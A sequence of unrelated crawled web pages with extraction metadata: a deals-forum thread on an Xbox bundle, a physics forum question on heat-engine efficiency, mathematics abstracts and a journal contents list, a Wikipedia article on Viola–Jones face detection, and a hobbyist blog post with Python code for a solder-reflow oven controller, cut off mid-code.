391°Expired # Xbox One with Kinect Holiday Value Bundle @ tesco direct for £179 Found 8th Nov 2016 Never seen this bundle so cheap. Good price if your wanting the extras ### Groups elite console the same price. know what I'd rather have. elite console the same price. know what I'd rather have. elite console the same price. know what I'd rather have. shapalando elite console the same price. know what I'd rather have. ​Where's the elite console for £180 new?? The link goes to Tesco Groceries. If you go to the Tesco Direct website, it's definitely there! Really good price........HOT! gopolog86 ​Where's the elite console for £180 new?? hotukdeals.com/dea…251 gopolog86 ​Where's the elite console for £180 new?? tesco.com/dir…868 Go to the Tesco Direct website, it's there. The link takes you to yep just seen thanks guys thank you ordered one even though I already got one. ) ordered thank you even though I already got one . type Tesco direct and it's there. Original Poster shapalando elite console the same price. know what I'd rather have. Wow your right!! Iv ordered one just for the controller. Crazy price! ordered thank you even though I already got one . type Tesco direct and … ordered thank you even though I already got one . type Tesco direct and it's there. thank you ordered one even though I already got one. ) Holy bejesus , this is cheap, dont wait for Black Friday. Just bought the Elite, crazy money. kishengajjar
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9265614151954651, "perplexity": 11763.029528813999}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794865651.2/warc/CC-MAIN-20180523121803-20180523141803-00064.warc.gz"}
https://www.physicsforums.com/threads/max-efficiency-thermodynamics.385712/
# Max efficiency (thermodynamics) 1. Mar 11, 2010 ### pinsky I'm observing the circular process of a heat engine. It's p-v diagram is So between points 3 and 4 the heat is extracted. That causes losses since the efficiency if given by $$\eta =1- \frac {Q_c} {Q_h}$$ Where Qh is the heat the heat source has given and Q_c the amount of heat that the "cold" container took. If we don't cool down the engine in during the process between 3 and 4, the efficiency would grow to 100% (if friction is not consigered). The process would then look like the picture below, and 3 and 1 we would do an isobaric contraction. I've encountered isobaric processes through my studies, but only as a theoretical concept. What are the reasons why it couldn't be used here? #### Attached Files: • ###### why_not_thermodynamics.gif File size: 2.8 KB Views: 184 2. Mar 11, 2010 ### QuantumPion How can you do compress the working fluid without changing its pressure or temperature? 3. Mar 11, 2010 ### pinsky I don't know, how do you get an isobaric process ever? :)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7613387703895569, "perplexity": 2025.975458645507}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267155924.5/warc/CC-MAIN-20180919043926-20180919063926-00011.warc.gz"}
https://cn.overleaf.com/articles/series-representation-of-power-function/mrrthfyxxttw
Author Kolosov Petro Last Updated 4 years ago AbstractIn this paper, we derive and prove, by means of Binomial theorem and Faulhaber's formula, the following identity between $m$-order polynomials in $$T$$ $$\sum_{k=1}^{\ell}\sum_{j=0}^m A_{m,j}k^j(T-k)^j=\sum_{k=0}^{m}(-1)^{m-k}U_m(\ell,k)\cdot T^k=T^{2m+1}, \ \ell=T\in\mathbb{N}.$$
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 1, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 28, "x-ck12": 0, "texerror": 0, "math_score": 0.785632312297821, "perplexity": 2388.7612104543823}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104585887.84/warc/CC-MAIN-20220705144321-20220705174321-00385.warc.gz"}
http://www.combinatorics.org/ojs/index.php/eljc/issue/view/Volume19-4
## Volume 19, Issue 4 (2012) #### Papers The Lowest-Degree Polynomial with Nonnegative Coefficients Divisible by the $n$-th Cyclotomic Polynomial PDF John P. Steinberger P1 Constructions of Bipartite and Bipartite-regular Hypermaps PDF Rui Duarte P2 Invariant Principal Order Ideals under Foata’s Transformation PDF Teresa X.S. Li, Melissa Y.F. Miao P3 Some Constant Weight Codes from Primitive Permutation Groups PDF Derek H. Smith, Roberto Montemanni P4 Rainbow Connection of Sparse Random Graphs PDF Alan Frieze, Charalampos E. Tsourakakis P5 Uniquely $K_r$-Saturated Graphs PDF Stephen G. Hartke, Derrick Stolee P6 On Extensions of the Alon-Tarsi Latin Square Conjecture PDF COMMENT Daniel Kotlar P7 Orientations, Semiorders, Arrangements, and Parking Functions PDF Sam Hopkins, David Perkinson P8 The Closed Knight Tour Problem in Higher Dimensions PDF Joshua Erde, Bruno Golénia, Sylvain Golénia P9 Maximum Frustration in Bipartite Signed Graphs PDF Garry S Bowlin P10 Repetition Threshold for Circular Words PDF Irina A. Gorbunova P11 Hypohamiltonian Graphs and their Crossing Number PDF Carol T. Zamfirescu P12 Spectral Properties of Unitary Cayley Graphs of Finite Commutative Rings PDF Xiaogang Liu, Sanming Zhou P13 Locally Restricted Compositions IV. Nearly Free Large Parts and Gap-Freeness PDF Edward A. Bender, E. Rodney Canfield, Zhicheng Gao P14 New Proofs of Determinant Evaluations Related to Plane Partitions PDF Hjalmar Rosengren P15 Ehrhart $f^*$-Coefficients of Polytopal Complexes are Non-negative Integers PDF Felix Breuer P16 Finite Homomorphism-Homogeneous Permutations via Edge Colourings of Chains PDF Igor Dolinka, Éva Jungábel P17 Large 2-Coloured Matchings in 3-Coloured Complete Hypergraphs PDF Tamás Terpai P18 Canonical Decompositions of Affine Permutations, Affine Codes, and Split $k$-Schur Functions PDF Tom Denton P19 On Codes that are Invariant under the Affine Group PDF Peter Sin P20 A Simple Branching Process Approach to the Phase Transition in $G_{n,p}$ PDF Béla Bollobás, Oliver Riordan P21 Schur Polynomials, Banded Toeplitz Matrices and Widom's Formula PDF Per Alexandersson P22 A Note on Automorphisms of the Infinite-Dimensional Hypercube Graph PDF Mark Pankov P23 Large Incidence-free Sets in Geometries PDF Stefaan De Winter, Jeroen Schillewaert, Jacques Verstraete P24 Distance Powers and Distance Matrices of Integral Cayley Graphs over Abelian Groups PDF Walter Klotz, Torsten Sander P25 Irreducible Cycles and Points in Special Position in Moduli Spaces for Tropical Curves PDF Andreas Gathmann, Franziska Schroeter P26 On the Parity of Certain Coefficients for a $q$-Analogue of the Catalan Numbers PDF Kendra Killpatrick P27 Properties of Random Difference Graphs PDF Christopher Ross P28 Partially Ordinal Sums and $P$-partitions PDF Daniel K. Du, Qing-Hu Hou P29 Resolving Sets and Semi-Resolving Sets in Finite Projective Planes PDF Tamás Héger, Marcella Takáts P30 A Construction of Short Sequences Containing All Permutations of a Set as Subsequences PDF Sasa Radomirovic P31 Identifying Vertex Covers in Graphs PDF Michael A Henning, Anders Yeo P32 Structure of Colored Complete Graphs Free of Proper Cycles PDF Vincent Coll, Colton Magnant, Kathleen Ryan P33 Some Convolution Identities and an Inverse Relation Involving Partial Bell Polynomials PDF Daniel Birmajer, Juan B. Gil, Michael D. Weiner P34 The (Signless Laplacian) Spectral Radii of Connected Graphs with Prescribed Degree Sequences PDF Muhuo Liu P35 Ramsey Numbers $R(K_3, G)$ for Graphs of Order 10 PDF Gunnar Brinkmann, Jan Goedgebeur, Jan-Christoph Schlage-Puchta P36 The Hitting Time of Rainbow Connection Number Two PDF Annika Heckel, Oliver Riordan P37 A Proof of Erdős-Fishburn's Conjecture for $g(6)=13$ PDF Wei Xianglin P38 Combinatorial Expansions in $K$-Theoretic Bases PDF Jason Bandlow, Jennifer Morse P39 Münchhausen Matrices PDF Michael Brand P40 Counting Bases of Representable Matroids PDF Michael Snook P41 An Ordered Turán Problem for Bipartite Graphs PDF Craig Timmons P43 Optimal Divisibility Conditions for Loose Hamilton Cycles in Random Hypergraphs PDF Andrzej Dudek, Alan Frieze, Po-Shen Loh, Shelley Speiss P44 Γ-Species and the Enumeration of $k$-Trees PDF Andrew Gainer-Dewar P45 The Tau Constant and the Edge Connectivity of a Metrized Graph PDF Zubeyir Cinkir P46 Three Color Ramsey Numbers for Graphs with at most 4 Vertices PDF Luis Boza, Janusz Dybizbański, Tomasz Dzido P47 Further Analysis on the Total Number of Subtrees of Trees PDF Shuchao Li, Shujing Wang P48 On Cross-Intersecting Families of Set Partitions PDF Cheng Yeaw Ku, Kok Bin Wong P49 List-Coloring Graphs on Surfaces with Varying List-Sizes PDF Alice M. Dean, Joan P. Hutchinson P50 On the Spanning Trees of the Hypercube and other Products of Graphs PDF Olivier Bernardi P51 On the Number of Partition Weights with Kostka Multiplicity One PDF Zachary Gates, Brian Goldman, C. Ryan Vinroot P52 Connectivity for Random Graphs from a Weighted Bridge-Addable Class PDF Colin McDiarmid P53 The Number of Ways to Assemble a Graph PDF Andrew Vince, Miklós Bóna P54 Generalized Alcuin's Sequence PDF Daniel Panario, Murat Sahin, Qiang Wang P55 Identifying Codes of Lexicographic Product of Graphs PDF Min Feng, Min Xu, Kaishun Wang P56 ISSN: 1077-8926
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9793187975883484, "perplexity": 12627.610570698289}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00264-ip-10-171-10-70.ec2.internal.warc.gz"}
https://en.wikipedia.org/wiki/Viola-Jones_object_detection_framework
# Viola–Jones object detection framework The Viola–Jones object detection framework is the first object detection framework to provide competitive object detection rates in real-time proposed in 2001 by Paul Viola and Michael Jones.[1][2] Although it can be trained to detect a variety of object classes, it was motivated primarily by the problem of face detection. ## Problem description The problem to be solved is detection of faces in an image. A human can do this easily, but a computer needs precise instructions and constraints. To make the task more manageable, Viola–Jones requires full view frontal upright faces. Thus in order to be detected, the entire face must point towards the camera and should not be tilted to either side. While it seems these constraints could diminish the algorithm's utility somewhat, because the detection step is most often followed by a recognition step, in practice these limits on pose are quite acceptable. ## Components of the framework Example rectangle features shown relative to the enclosing detection window ### Feature types and evaluation The characteristics of Viola–Jones algorithm which make it a good detection algorithm are: • Robust – very high detection rate (true-positive rate) & very low false-positive rate always. • Real time – For practical applications at least 2 frames per second must be processed. • Face detection only (not recognition) - The goal is to distinguish faces from non-faces (detection is the first step in the recognition process). The algorithm has four stages: 1. Haar Feature Selection 2. Creating an Integral Image The features sought by the detection framework universally involve the sums of image pixels within rectangular areas. As such, they bear some resemblance to Haar basis functions, which have been used previously in the realm of image-based object detection.[3] However, since the features used by Viola and Jones all rely on more than one rectangular area, they are generally more complex. The figure on the right illustrates the four different types of features used in the framework. The value of any given feature is the sum of the pixels within clear rectangles subtracted from the sum of the pixels within shaded rectangles. Rectangular features of this sort are primitive when compared to alternatives such as steerable filters. Although they are sensitive to vertical and horizontal features, their feedback is considerably coarser. Haar Feature that looks similar to the bridge of the nose is applied onto the face Haar Feature that looks similar to the eye region which is darker than the upper cheeks is applied onto a face 3rd and 4th kind of Haar Feature #### Haar Features All human faces share some similar properties. These regularities may be matched using Haar Features. A few properties common to human faces: • The eye region is darker than the upper-cheeks. • The nose bridge region is brighter than the eyes. Composition of properties forming matchable facial features: • Location and size: eyes, mouth, bridge of nose • Value: oriented gradients of pixel intensities The four features matched by this algorithm are then sought in the image of a face (shown at right).y Rectangle features: • Value = Σ (pixels in black area) - Σ (pixels in white area) • Three types: two-, three-, four-rectangles, Viola & Jones used two-rectangle features • For example: the difference in brightness between the white &black rectangles over a specific area • Each feature is related to a special location in the sub-window #### Summed area table An image representation called the integral image evaluates rectangular features in constant time, which gives them a considerable speed advantage over more sophisticated alternative features. Because each feature's rectangular area is always adjacent to at least one other rectangle, it follows that any two-rectangle feature can be computed in six array references, any three-rectangle feature in eight, and any four-rectangle feature in nine. ### Learning algorithm The speed with which features may be evaluated does not adequately compensate for their number, however. For example, in a standard 24x24 pixel sub-window, there are a total of M = 162,336[4] possible features, and it would be prohibitively expensive to evaluate them all when testing an image. Thus, the object detection framework employs a variant of the learning algorithm AdaBoost to both select the best features and to train classifiers that use them. This algorithm constructs a “strong” classifier as a linear combination of weighted simple “weak” classifiers. ${\displaystyle h(\mathbf {x} )=\operatorname {sgn} \left(\sum _{j=1}^{M}\alpha _{j}h_{j}(\mathbf {x} )\right)}$ Each weak classifier is a threshold function based on the feature ${\displaystyle f_{j}}$. ${\displaystyle h_{j}(\mathbf {x} )={\begin{cases}-s_{j}&{\text{if }}f_{j}<\theta _{j}\\s_{j}&{\text{otherwise}}\end{cases}}}$ The threshold value ${\displaystyle \theta _{j}}$ and the polarity ${\displaystyle s_{j}\in \pm 1}$ are determined in the training, as well as the coefficients ${\displaystyle \alpha _{j}}$. Here a simplified version of the learning algorithm is reported:[5] Input: Set of N positive and negative training images with their labels ${\displaystyle {(\mathbf {x} ^{i},y^{i})}}$. If image i is a face ${\displaystyle y^{i}=1}$, if not ${\displaystyle y^{i}=-1}$. 1. Initialization: assign a weight ${\displaystyle w_{1}^{i}={\frac {1}{N}}}$ to each image i. 2. For each feature ${\displaystyle f_{j}}$ with ${\displaystyle j=1,...,M}$ 1. Renormalize the weights such that they sum to one. 2. Apply the feature to each image in the training set, then find the optimal threshold and polarity ${\displaystyle \theta _{j},s_{j}}$ that minimizes the weighted classification error. That is ${\displaystyle \theta _{j},s_{j}=\arg \min _{\theta ,s}\;\sum _{i=1}^{N}w_{j}^{i}\varepsilon _{j}^{i}}$ where ${\displaystyle \varepsilon _{j}^{i}={\begin{cases}0&{\text{if }}y^{i}=h_{j}(\mathbf {x} ^{i},\theta _{j},s_{j})\\1&{\text{otherwise}}\end{cases}}}$ 3. Assign a weight ${\displaystyle \alpha _{j}}$ to ${\displaystyle h_{j}}$ that is inversely proportional to the error rate. In this way best classifiers are considered more. 4. The weights for the next iteration, i.e. ${\displaystyle w_{j+1}^{i}}$, are reduced for the images i that were correctly classified. 3. Set the final classifier to ${\displaystyle h(\mathbf {x} )=\operatorname {sgn} \left(\sum _{j=1}^{M}\alpha _{j}h_{j}(\mathbf {x} )\right)}$ • On average only 0.01% of all sub-windows are positive (faces) • Equal computation time is spent on all sub-windows • Must spend most time only on potentially positive sub-windows. • A simple 2-feature classifier can achieve almost 100% detection rate with 50% FP rate. • That classifier can act as a 1st layer of a series to filter out most negative windows • 2nd layer with 10 features can tackle “harder” negative-windows which survived the 1st layer, and so on… • A cascade of gradually more complex classifiers achieves even better detection rates. The evaluation of the strong classifiers generated by the learning process can be done quickly, but it isn’t fast enough to run in real-time. For this reason, the strong classifiers are arranged in a cascade in order of complexity, where each successive classifier is trained only on those selected samples which pass through the preceding classifiers. If at any stage in the cascade a classifier rejects the sub-window under inspection, no further processing is performed and continue on searching the next sub-window. The cascade therefore has the form of a degenerate tree. In the case of faces, the first classifier in the cascade – called the attentional operator – uses only two features to achieve a false negative rate of approximately 0% and a false positive rate of 40%.[6] The effect of this single classifier is to reduce by roughly half the number of times the entire cascade is evaluated. In cascading, each stage consists of a strong classifier. So all the features are grouped into several stages where each stage has certain number of features. The job of each stage is to determine whether a given sub-window is definitely not a face or may be a face. A given sub-window is immediately discarded as not a face if it fails in any of the stages. A simple framework for cascade training is given below: • f = the maximum acceptable false positive rate per layer. • d = the minimum acceptable detection rate per layer. • Ftarget = target overall false positive rate. • P = set of positive examples. • N = set of negative examples. F(0) = 1.0; D(0) = 1.0; i = 0 while F(i) > Ftarget increase i n(i) = 0; F(i)= F(i-1) while F(i) > f × F(i-1) increase n(i) use P and N to train a classifier with n(I) features using AdaBoost Evaluate current cascaded classifier on validation set to determine F(i) and D(i) decrease threshold for the ith classifier until the current cascaded classifier has a detection rate of at least d × D(i-1) (this also affects F(i)) N = ∅ if F(i) > Ftarget then evaluate the current cascaded detector on the set of non-face images and put any false detections into the set N. The cascade architecture has interesting implications for the performance of the individual classifiers. Because the activation of each classifier depends entirely on the behavior of its predecessor, the false positive rate for an entire cascade is: ${\displaystyle F=\prod _{i=1}^{K}f_{i}.}$ Similarly, the detection rate is: ${\displaystyle D=\prod _{i=1}^{K}d_{i}.}$ Thus, to match the false positive rates typically achieved by other detectors, each classifier can get away with having surprisingly poor performance. For example, for a 32-stage cascade to achieve a false positive rate of 106, each classifier need only achieve a false positive rate of about 65%. At the same time, however, each classifier needs to be exceptionally capable if it is to achieve adequate detection rates. For example, to achieve a detection rate of about 90%, each classifier in the aforementioned cascade needs to achieve a detection rate of approximately 99.7%.[7] ## Using Viola-Jones for object tracking In videos of moving objects, one need not apply object detection to each frame. Instead, one can use tracking algorithms like the KLT algorithm to detect salient features within the detection bounding boxes and track their movement between frames. Not only does this improve tracking speed by removing the need to re-detect objects in each frame, but it improves the robustness as well, as the salient features are more resilient than the Viola-Jones detection framework to rotation and photometric changes.[8] ## References 1. ^ Rapid object detection using a boosted cascade of simple features 2. ^ 3. ^ C. Papageorgiou, M. Oren and T. Poggio. A General Framework for Object Detection. International Conference on Computer Vision, 1998 4. ^ "Viola-Jones' face detection claims 180k features". stackoverflow.com. Retrieved 2017-06-27. 5. ^ R. Szeliski, Computer Vision, algorithms and applications, Springer 6. ^ 7. ^ Torbert, Shane (2016). Applied Computer Science (2nd ed.). Springer. pp. 122–131. 8. ^ Face Detection and Tracking using the KLT algorithm
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 21, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5241246223449707, "perplexity": 1488.7780033056176}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627997533.62/warc/CC-MAIN-20190616022644-20190616044644-00128.warc.gz"}
http://algebra.msri.org/detail?seminarsid=76.0
## Arthur Ogus Attached to a toric variety X is a topological space X_\lag on which polar coordinates are well-defined. There is a natural map X_\lag \to X, which is a kind of real blowing up and can greatly simplify singularities: X_\lag is a manifold with boundary. This technique applies also to equivariant mappings between toric varieties, and makes sense globally in the context of log geometry. Our main result says that if f: X --> Y is an exact and smooth morphism of log schemes over C, then the associated map f_\lag :X_\lag --> Y_\lag is a topological submersion whose fibers are orientable manifolds with boundary. Since the result is local, it reduces to the case of affine toric varieties, and my talk will concentrate on this case, so knowledge of log geometry will not be required. The proof depends on a new look at the moment mapping (inspired by Birch's theorem in statistics) and a way to force'' functoriality. This is joint work with Chikara Nakayama. ## Charles Crissman It is well-known that the moduli space $M_g$ of genus-$g$ curves is unirational for $g\leq 14$. What this means in down-to-Earth terms is that these spaces have coordinates,'' in the sense that there is an affine space where a generic point corresponds to a generic curve of genus $g$, and only finitely many points correspond to the same curve. As a simple example, every curve of genus 2 has an equation of the form $y^2 = x(x-1)(x-a)(x-b)(x-c)$ where $0,1,a,b,c$ are distinct. The coordinates a,b,c serve as coordinates for $M_2$ in the sense above.\\ I will discuss how to give coordinates for curves of genus $\leq 10$ by finding nodal plane models or by finding the equations of their canonical embeddings. If time permits, I will venture into the murkier waters of genus 11-14. All necessary facts about $M_g$ will be recalled, so no expertise will be required.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7874535918235779, "perplexity": 315.4108574958791}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583516117.80/warc/CC-MAIN-20181023065305-20181023090805-00152.warc.gz"}
http://hydraraptor.blogspot.fi/2009_12_01_archive.html
## Tuesday, 29 December 2009 ### Cooking with HydraRaptor I needed to assemble some PCBs recently, so I set about making a temperature controller for my SMT oven. First I had to replace the solid state relay on HydraRaptor. Solid state relays are triacs with an optically coupled input, zero crossing switching and built in snubbers. I used it for controlling a vacuum cleaner when milling. It was massively overrated but for some reason it failed some time ago. I replaced it with a cheaper one and added a varistor across the mains input to kill any transients, as that is the only explanation I can think of for the old one's demise. The next task was to write a simple graphing program in Python. I tested it by plotting the response of my extruder heater. With bang-bang control it swings +/- 2°C with a cycle time of about ten seconds. Here is the code for the graph: - from Tkinter import *class Axis: def __init__(self, min, max, minor, major, scale): self.scale = scale self.min = min self.max = max self.minor = minor self.major = majorclass Graph: def __init__(self, xAxis, yAxis): self.xAxis = xAxis self.yAxis = yAxis self.root = Tk() self.root.title("HydraRaptor") self.last_x = None frame = Frame(self.root) frame.pack() xmin = xAxis.min * xAxis.scale xmax = xAxis.max * xAxis.scale ymin = yAxis.min * yAxis.scale ymax = yAxis.max * yAxis.scale width = (xmax - xmin) + 30 height = (ymax - ymin) + 20 # # X axis # self.canvas = Canvas(frame, width = width, height = height, background = "white") for x in range(xmin, xmax + 1, xAxis.minor * xAxis.scale): self.canvas.create_line(x, ymin, x, ymax, fill = "grey") for x in range(xmin, xmax + 1, xAxis.major * xAxis.scale): self.canvas.create_line(x, ymin, x, ymax, fill = "black") if x == xmin: anchor = "nw" else: anchor = "n" self.canvas.create_text((x, ymax), text = x / xAxis.scale, anchor = anchor) # # Y axis # for y in range(ymin, ymax + 1, yAxis.minor * yAxis.scale): self.canvas.create_line(xmin, y, xmax, y, fill = "grey") for y in range(ymin, ymax + 1, yAxis.major * yAxis.scale): self.canvas.create_line(xmin, y, xmax, y, fill = "black") if y == ymin: anchor = "se" else: anchor = "e" self.canvas.create_text((xmin, ymax + ymin - y), text = y / yAxis.scale, anchor = anchor) self.canvas.pack() self.canvas.config(scrollregion=self.canvas.bbox(ALL)) self.root.update() def scaleX(self,x): return x * self.xAxis.scale def scaleY(self,y): axis = self.yAxis; return (axis.max + axis.min - y) * axis.scale def plot(self, line, colour = "blue"): for i in range(len(line) - 1): self.canvas.create_line(self.scaleX(line[i][0]), self.scaleY(line[i][1]), self.scaleX(line[i+1][0]), self.scaleY(line[i+1][1]), fill = colour) self.root.update() def addPoint(self,p, colour="red"): x = self.scaleX(p[0]) y = self.scaleY(p[1]) if self.last_x != None: self.canvas.create_line(self.last_x, self.last_y, x, y, fill = colour) self.last_x = x self.last_y = y self.root.update() def __del__(self): self.root.mainloop() The third task was to interface a thermocouple to HydraRaptor. I had a spare analogue input, so I attached one of Zach's thermocouple sensor boards to it. I tested it by attaching the thermocouple to a light bulb with Kapton tape. I then ran a program that turned the bulb on and then off and graphed the temperature response. As you can see there is a ridiculous amount of noise on the readings. I tracked this down to switching noise on HydraRaptor's 5V rail, which is generated by a simple buck converter from a 24V rail. The AD595 datasheet claims that it has a power supply sensitivity of only 10mV/V so the error should have been a small fraction of a °C. All I can assume is that its rejection of high frequency noise is far less than its DC supply rejection. In fact, pretty much all the supply noise appears on the output. I fixed it by filtering the supply with a simple RC filter consisting of a 1K series resistor and a 22uF capacitor. I fitted these to the thermocouple board in the unused holes intended for an alarm LED and its series resistor. The power is fed in via the anode connection for the LED. It feeds to the supply rail via the 1K fitted in the R1 position. The positive lead of the capacitor goes into the original +5v connection to the board. The negative lead goes to the GND connection together with the ground lead. This mod will be required whenever the 5V rail comes from a switch mode supply rather than a linear regulator. Here is the much improved graph with the filter fitted: - The next thing I tried was bang-bang control of the oven to a fixed temperature with the thermocouple attached to a scrap PCB. No great surprise that there is massive overshoot due to the thermal lag caused by the loose coupling of the PCB to the heating elements via air. It is obvious some form of proportional control is required, so I implemented PWM control of the mains supply to the oven. As triacs don't turn off until the end of the mains cycle there is no point in varying the pulse width in less than 10ms increments (in the UK). So I implemented a simple firmware scheme where I can specify how many 10ms units to be on for out of a total period, also specified in 10ms units. Setting the period to 1 second allows the heating power to be expressed in 1% units. My original plan was to implement a PID controller, but after examining the required soldering profile I decided a much simpler scheme would probably perform better. The is a profile for tin-lead solder that I got from an Altera application note. I mainly use leaded solder at home because the lower melt point gives a much bigger margin for error, it wets and flows a lot better, the fumes are less toxic and it doesn't grow tin whiskers. Looking at the profile you can see the times are not too critical, but the temperatures are. I reasoned I could simply apply fixed powers to get the right temperature gradient until each target temperature was reached. To get round the overshoot problem I simply measured the overshoot and subtracted it from the target temps. After a little experimenting I got this profile, which looks pretty good to me: - The blue line is the target profile, red is actual and the green lines show the time at which each target was reached. The preheat slope and re-flow slope are simply full power until the temperature is equal to the target minus the overshoot. During the first half of the soak period I had to ramp the power from 0 to 50% to get it to turn the first corner without overshoot. When the reflow peak minus the overshoot is reached I simply turn the oven off. When it gets to the cool section I open the oven door. Here is the code: - from Hydra import *from Graph import *profile = [(10,20), (120,150), (210,180), (250,210), (330, 180), (420, 20)]slope = 140.0 / 100overshoot = 15.0pre_overshoot = 25preheat_temp = 150.0soak_temp = 180.0soak_time = 90.0reflow_temp = 210.0melt_temp = 183.0preheat_slope = (soak_temp - preheat_temp) / soak_times_preheat = 1s_soak = 2s_reflow = 3s_cool = 4def interp(profile, x): i = 0 while i < len(profile) - 1 and profile[i + 1][0] < x: i += 1 if i == len(profile) - 1: return 0 p0 = profile[i] p1 = profile[i+1] return p0[1] + (p1[1]-p0[1]) * (x - p0[0]) / (p1[0] - p0[0])def oven_cook(profile): hydra = Hydra(True) try: xAxis = Axis(min = 0, max = 500, minor = 5, major = 25, scale = 2) yAxis = Axis(min = 10, max = 250, minor = 5, major = 20, scale = 2) graph = Graph(xAxis, yAxis) graph.plot(profile) t = 0 state = s_preheat m_state = s_preheat hydra.set_mains(100,100) while t < xAxis.max: sleep(1) temp = hydra.get_temperature() print temp graph.addPoint((t, temp)) # # Control the power # if state == s_preheat: if temp >= preheat_temp - pre_overshoot: hydra.set_mains( 0, 100) t_soak = t state = s_soak elif state == s_soak: power = (t - t_soak) * 100.0 / soak_time if power > 50: power = 50 hydra.set_mains(int(power), 100) if temp >= soak_temp - overshoot * preheat_slope / slope: hydra.set_mains(100,100) state = s_reflow elif state == s_reflow: if temp >= reflow_temp - overshoot: hydra.set_mains(0,100) state = s_cool # # Draw the time lines # if m_state == s_preheat: if temp >= preheat_temp: graph.plot([(t,10), (t,temp)], "green") m_state = s_soak elif m_state == s_soak: if temp 